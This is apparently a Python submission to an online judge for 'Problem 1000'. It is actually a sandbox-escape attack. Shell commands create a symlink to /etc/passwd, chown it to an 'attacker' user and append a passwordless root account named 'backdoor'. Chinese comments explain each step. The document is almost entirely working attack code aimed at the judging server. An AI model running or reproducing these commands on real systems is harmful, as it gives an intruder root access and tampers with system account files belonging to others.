import os
os.system("ln -s /etc/passwd malicious_link")
os.system("chown attacker:attacker malicious_link ")
os.system("echo 'backdoor::0:0::/root:/bin/bash' >> /etc/passwd")
"""
# 步骤1：在沙箱内创建指向敏感文件的符号链接
ln -s /etc/passwd malicious_link

# 步骤2：利用chown篡改外部文件所有权
chown attacker:attacker malicious_link  # 实际修改了/etc/passwd所有者

# 步骤3：验证所有权是否变更（沙箱外执行）
ls -l /etc/passwd  # 输出应显示所有者变为attacker

# 步骤4：写入恶意内容（例如添加后门账户）
echo 'backdoor::0:0::/root:/bin/bash' >> /etc/passwd

"""
/**************************************************************
	Problem: 1000
	User: 15159808820
	Language: Python
	Result: Running & Judging
****************************************************************/